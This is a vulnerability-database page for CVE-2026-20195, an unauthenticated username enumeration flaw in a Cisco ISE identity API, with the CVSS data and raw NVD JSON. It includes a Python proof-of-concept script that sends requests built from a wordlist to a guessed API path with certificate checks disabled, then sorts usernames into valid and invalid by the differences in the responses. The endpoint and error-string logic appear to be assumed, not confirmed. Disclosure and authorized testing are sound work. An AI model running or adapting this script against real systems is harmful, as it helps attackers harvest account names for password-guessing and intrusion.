Security Vulnerability Report
中文
CVE-2026-20195 CVSS 5.3 MEDIUM

CVE-2026-20195

Published: 2026-05-06 17:16:22
Last Modified: 2026-05-06 18:59:53
Source: [email protected]

Description

A vulnerability in an identity management API endpoint of Cisco ISE could allow an unauthenticated, remote attacker to enumerate valid user accounts on an affected device. This vulnerability exists because error messages are observed when the affected API endpoint is called. An attacker could exploit this vulnerability by sending a series of crafted requests to the affected endpoint and analyzing the differentiated responses. A successful exploit could allow the attacker to compile a list of valid usernames on an affected system.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Cisco ISE (具体受影响版本请查阅 Cisco Security Advisory cisco-sa-ise-unauth-bypass-uxjRXGpb)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # Target configuration # Replace with the actual vulnerable endpoint URL target_url = "https://<ise-ip>/admin/API/mgmt/identity/user" wordlist = ["admin", "cisco", "guest", "user", "test"] print("[*] Starting enumeration...") headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-20195-Scanner)", "Accept": "application/json" } for username in wordlist: # Crafting the request to probe the API endpoint # This payload is designed to trigger the error message differentiation try: response = requests.get(f"{target_url}/{username}", headers=headers, timeout=5, verify=False) # Analyzing the response based on the vulnerability description # Logic: Different error messages indicate valid vs invalid users if "Invalid user" not in response.text and response.status_code != 404: print(f"[+] Valid User Found: {username} (Status: {response.status_code})") else: print(f"[-] Invalid User: {username}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to {target_url}: {e}") sys.exit(1) print("[*] Scan complete.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20195", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:21.630", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in an identity management API endpoint of Cisco ISE could allow an unauthenticated, remote attacker to enumerate valid user accounts on an affected device.\r\n\r\nThis vulnerability exists because error messages are observed when the affected API endpoint is called. An attacker could exploit this vulnerability by sending a series of crafted requests to the affected endpoint and analyzing the differentiated responses. A successful exploit could allow the attacker to compile a list of valid usernames on an affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-bypass-uxjRXGpb", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.